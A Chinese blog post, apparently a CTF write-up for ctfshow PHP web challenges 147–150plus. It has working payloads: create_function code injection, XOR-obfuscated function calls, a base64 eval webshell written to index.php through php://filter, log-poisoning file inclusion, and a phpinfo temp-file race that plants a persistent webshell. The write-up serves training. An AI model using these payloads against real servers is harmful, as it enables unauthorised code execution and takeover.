ctfshow学习记录-web入门(php特性147-150&150plus)

已于 2022-08-13 09:45:42 修改
阅读量892 收藏 5
点赞数
分类专栏: ctf-web # ctfshow-web 文章标签: 学习
于 2022-08-02 14:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48780534/article/details/126040933
版权

目录

最近先不更web入门了,后期有时间了我会把web入门的wp搬到平台上。

近期我要去其他平台刷一刷web题~

web147

解答
正则匹配绕过,只要ctfshow里有一个不是数字、小写字母和下划线就能绕过。

/i:大小写不敏感匹配
/s:点号元字符匹配所有字符,包含换行符。
/D:元字符美元符号仅仅匹配目标字符串的末尾

php里默认命名空间是\,所有原生函数和类都在这个命名空间中。
调用一个函数时直接写函数名function_name(),相当于是相对路径调用; 如写某一全局函数的完全限定名称\function_name()调用,则是写了一个绝对路径。

在这里插入图片描述

(详情可以看php手册里的命名空间部分)

所以post时ctf可以通过加上\绕过匹配。

找个不需要第一个参数的函数。可以用create_function匿名函数。虽然该函数自PHP 7.2起已经弃用,但是还是可以eval执行函数,只是需要把匿名部分闭合。

get?show=}system('tac f*');/*
postctf=%5ccreate_function
在这里插入图片描述

可以这么理解:create_function创建一个匿名函数,我们假设就叫niming。
string create_function( string $args, string $code)那么具体就是如下面所示的样子:

function niming($args,...){
		$code
}

所以就需要}闭合,闭合之后,那就多出来一个},这就需要用注释符注释掉。

web148

解答:正则匹配,执行code。根据题目,让$codeget_ctfshow_fl0g即可。还是利用上一组题,如web143的思路,用异或^构造。
(或者执行system函数都行)

payload?code=("%07%05%09%01%03%09%06%08%08%0f%08%01%06%0c%0b%07"^"%60%60%7d%5e%60%7d%60%7b%60%60%7f%5e%60%60%3b%60")();

查看源码获取flag。

在这里插入图片描述

web149

解答:可以写入文件,且当前目录下只能保留index.php。
那么就直接用伪协议把木马写入到index.php就可以了。
get?ctf=php://filter/write=convert.base64-decode/resource=index.php
postshow=PD9waHAgQGV2YWwoJF9QT1NUWydqeiddKTs/Pg==
在这里插入图片描述

然后蚁剑连接也行,直接post也可。
在这里插入图片描述

web150

解答:post的ctf只是限制了不能有冒号,别的并没有被过滤include($ctf),可以进行日志包含。

因为$key有过滤字符,所以我们可以通过User-Agent传递木马信息。
在这里插入图片描述

然后通过extract变量覆盖,满足isVip是true的条件限制。

get?isVIP=true
postctf=/var/log/nginx/access.log&1=system('tac f*');
在这里插入图片描述

web150plus

解答:php中变量名的点和空格会被转换成下划线。

payload?..CTFSHOW..=phpinfo
原题说是需要条件竞争,所以flag改为了环境变量。phpinfo后查找即可获得。

在这里插入图片描述

这道题可以联系到web123。那道题里用的是CTF[SHOW.COM解析为CTF_SHOW.COM,是说对不符合规则的变量里只转换一次,变量名中的[也会被替换为_,但其后面的点.就不再进行替换了。

接下来学习一下原题的思路:(不过没做过原题,也不确定思路是不是这个)

文件包含,在临时文件消失前包含它。

利用phpinfo(具体看一下“进一步学习”的三个链接,特别是第一个链接)。

(说实话原题被删减有点遗憾,但是完全理解,我后续再找题或者搭建平台测试吧)

phpinfo会打印上传临时文件的路径,包含临时文件就可以getshell。

先发送数据包给phpinfo页面,从返回页面中匹配出临时文件名,再将这个文件名发送给文件包含漏洞页面,进行getshell。临时文件在第一个请求phpinfo页面渲染加载完毕后会被删除。也就是说如果第一个请求结束,临时文件被删,第二个请求就无法进行包含了。

1)我们需要让phpinfo页面加载的慢一点。

phpinfo页面会将我们post的数据包里的header、get等信息都打印出来,所以我们要把这个数据包的header、get等位置塞满垃圾数据,加大phpinfo加载时间。

php发送数据是分包发送,默认的输出缓冲区大小为4096,即php每次返回4096个字节给socket连接。那么不管返回的信息是第几次,只要读取到的字符里包含临时文件名,就立即发送第二个数据包进行文件包含。

2)此时,发送的第一个数据包的socket连接还没结束,php还在继续每次输出4096个字节,临时文件还没有被删除。这时利用文件包含漏洞就可以成功包含临时文件getshell。

因为这个临时文件终归还是会被删除,所以直接上传是写一句话木马不可行,需要利用短暂的包含写入文件,将一句话木马写到如/tmp/jz,这样就不会被删除了。

<?php file_put_contents('/tmp/jz', '<?php @eval($_REQUEST[jz]);?>');?>

进一步学习

PHP文件包含漏洞(利用phpinfo)(先看这个,原理详细还有exp)

phpinfo函数_文件包含之通过phpinfo去Getshell@weixin_39528994

文件包含&奇技淫巧@mob604756ebed9f

System:提供服务器所在的操作系统的信息。
$_SERVER['SERVER_ADDR']:真实ip
$_SERVER["CONTEXT_DOCUMENT_ROOT"]:网站根目录
disable_functions:禁用函数
$_FILES:临时文件路径

向phpinfo页面post恶意代码,可以在$_FILES中看到上传的临时文件,如果该网站存在文件包含漏洞,便可以将恶意代码存储我们已知的绝对路径去包含它getshell。

九枕
关注
专栏目录
ctfshow web150_plus
qq_59970501的博客
10-21 701
web150_plus 源码 include("flag.php"); error_reporting(0); highlight_file(__FILE__); ​ class CTFSHOW{ private $username; private $password; private $vip; private $secret; ​ function __construct(){ $this->vip = 0; $thi...
CTFshow php特性 web147
Kradress的博客
12-18 876
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-19 02:04:38 */ highlight_file(__FILE__); if(isset($_POST['ctf'])){ $ctfshow = $_POST['ctf
CTFshow菜狗杯-misc-wp(详解 脚本 过程 全)
最新发布
wangluoanquan111的博客
08-21 878
废话不多话开启你们的旅程吧 这个也是我这几天才看 一些见解和思路分享给你们希望你们在旅途中玩的开心,学的开心✌( •̀ ω •́ )y。
CTFshow php特性 web150plus
Kradress的博客
12-19 465
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-19 07:12:57 */ include("flag.php"); error_reporting(0); highlight_file(__FILE__); class CTFSHOW{
CTFshow php特性 web150
Kradress的博客
12-19 558
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-19 07:12:57 */ include("flag.php"); error_reporting(0); highlight_file(__FILE__); class CTFSHOW{
CTFshow web147 本人小白菜鸟详细思路解析
sinat_31884905的博客
05-22 375
思路分析 //拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 题目给出的提示,表格给出来了就是ctfshow_user4,username就是flag 这里按理想到的回应是 1' union select 1,2,password from ctfshow_user4 where usernam
MyBatis-Plus入门+MyBatis-Plus文档手册 中文pdf高清版.rar
11-09
mybatis在持久层框架中还是比较火的,一般项目都是基于ssm。虽然mybatis可以直接在xml中...《MyBatis-Plus入门文档》主要介绍了MyBatis-Plus入门使用,以及关于mybatis-plus的更多介绍及特性,感兴趣的可以下载学习一下
MyBatis-Plus 快速入门案例(小白教程)
08-24
MyBatis-Plus 快速入门案例 MyBatis-Plus 是一个基于 MyBatis 的增强型持久层框架,提供了许多实用的功能,例如自动化的 SQL 生成、分页插件、performance analysis 等。本文将指导读者快速入门 MyBatis-Plus,并...
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7253
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
ctfshow web入门 php特性 web140--web150plus
2301_81040377的博客
04-06 1107
PHP 中的一个函数调用,该函数会使当前脚本暂停执行指定的秒数。这里的 $d 是一个变量,表示需要让脚本等待的秒数。是一段 PHP 代码,它使用了正则表达式函数 preg_match 来检查变量 $v3 的值是否完全由非单词字符组成。:从HTTP请求(GET参数ctf)获取文件名,并将POST请求体中的show参数内容写入到该文件中。加减异或什么的过滤了但是还有取反,所以可以用之前的payload。PHP中,数字是可以和命令进行一些运算的,例如。”),则包含(执行)$ctf 参数所指定的文件。
ctfshow php特性 web 89~150plus
shinygod的博客
03-07 723
目录web 92web 93web 94web 95web 96web 97web 98web 99web 100web 101web 102web 103web 104 web 92 num=0x117c intval($num,$base=0) //当base为0时,会自动检测num的进制 //例如:0x117c(16进制) == 4476(十进制) == 010574(8进制) web 93 在这里插入代码片 web 94 web 95 web 96 web 97 web 98 web 99 w
CTFShow web入门123-150 (php特性(二))
lonmar的博客
12-05 5595
CTFSHOW PHP特性web123-150
ctf.show的PHP特性(web89-web150)
热门推荐
wanan的博客
09-03 2万+
ctf.show的PHP特性(web89-web150)
CTFshow web入门 web150-web170 文件上传
qq_56815564的博客
07-04 789
俗话说的好,逆向手的尽头是全栈,于是我又回来学web了,前面可能还看得懂一点,后面因为一心只想着做题目去了就没讲太细了,不过如果前面理解的话后面肯定也是知道的,所以加油吧。
ctfshow
PUTAOAO的博客
08-12 217
crypto2_月自圆 已知m长为71 加密后长度为142 flag在m中第53位置则在密文中105的位置刚好是salt的位置 可以爆破salt和a f ⇒ 1c l ⇒ 29 a ⇒ 56 g ⇒ 66 from itertools import * from random import * from string import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(
ctf.show
giaogiao123的博客
02-15 276
进入页面首先看到一个题目看hint ?cmd 有了源码 看大佬的笔记这是一个php短标签,正则匹配 考虑绕过 ?cmd=?><?=`/???/?p /???????? p.p`;?> 然后出现文件下载,咱也不知道为撒,反正师傅都是这么写的,让我学明白了在更。 ...
ctfshow web入门118-150wp
Firebasky的博客
10-25 1127
前段时间太忙啦,就没有发。但是羽师傅也发了呢 CTFSHOW PHP特性篇(中篇 111-131) CTFSHOW PHP特性篇 (下篇132-150) 我就不写博客啦,还是发pdf吧,需要的可以下载 链接:https://pan.baidu.com/s/1YnkfV5wfCqPFr2HW1MwUEg 提取码:c0gf 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
ctfshow-web入门-php特性web147-web150_plus)
Welcome To Myon'Blog !
07-27 1503
:匹配字符串的开头。$:匹配字符串的结尾,确保整个字符串符合规则。[a-z0-9_]:表示允许小写字母、数字和下划线。*:匹配零个或多个前面的字符。/i:忽略大小写。s:匹配包括换行符在内的所有字符。D(PCRE 特有):美元符号 $ 仅匹配字符串的实际末尾,不匹配结尾的换行符。这里只需要让 $ctfshow 里面有其他字符即可满足 if 判断。在 PHP 中,命名空间(namespace)提供了一种组织代码的方式,可以避免类、函数和常量名称的冲突。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值